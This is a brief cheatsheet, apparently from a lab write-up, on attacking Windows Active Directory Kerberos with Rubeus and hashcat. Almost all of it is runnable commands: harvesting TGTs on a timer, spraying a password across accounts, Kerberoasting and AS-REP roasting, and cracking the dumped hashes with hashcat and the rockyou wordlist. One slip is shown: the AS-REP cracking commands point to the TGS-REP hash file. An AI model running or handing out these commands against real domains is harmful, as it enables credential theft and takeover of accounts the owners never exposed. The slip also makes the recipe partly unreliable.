• Basics
• Harvest TGT
• Password Spraying
• Combining with hashcat
• Kerberoasting and Hashcat
• AS-REP Roast and Hashcat

Rubeus is a great tool that allows us to interact with Kerberos. I recently went through an offensive campaign in my lab using Bloodhound, and this is intended as a quick cheatsheet.

Basics

Harvest TGT

Harvest all TGTs every X seconds

• https://github.com/GhostPack/Rubeus#harvest

.\rubeus.exe harvest /interval:30

Password Spraying

Bruteforcing/spraying one password across multiple user accounts

• https://github.com/GhostPack/Rubeus#brute

.\rubeus.exe brute /password:Password1 /noticket

Combining with hashcat

Hashcat can attempt to break hashes and find the cleartext passwords. Example hashes for Hascat are on the wiki which includes the relevant hash mode that we need to pass to the -m flag for hashcat.exe

Invoke-WebRequest "https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt" -OutFile "C:\hashcat\dict\rockyou.txt"

Kerberoasting and Hashcat

Bruteforcing RC4 hashes for service accounts which have a SPN

• https://github.com/GhostPack/Rubeus#kerberoast

.\rubeus.exe kerberoast
.\rubeus.exe kerberoast /outfile:C:\tools\hashcat\hashes\TGS-REP_hash.txt

.\hashcat.exe -m 13100 "hashes/TGS-REP_hash.txt" "dict/rockyou.txt"
.\hashcat.exe -D 1 -m 13100 "hashes/TGS-REP_hash.txt" "dict/rockyou.txt"

AS-REP Roast and Hashcat

Bruteforcing hashes for user/service accounts which have Kerberos preauthentication turned off, and why you should never select the 'Do not require Kerberos preauthentication' option in AD.

• https://github.com/GhostPack/Rubeus#asreproast

.\rubeus.exe asreproast
.\rubeus.exe asreproast /outfile:C:\tools\hashcat\hashes\AS-REP_hash.txt

.\hashcat.exe -m 18200 "hashes/TGS-REP_hash.txt" "dict/rockyou.txt"
.\hashcat.exe -D 1 -m 18200 "hashes/TGS-REP_hash.txt" "dict/rockyou.txt"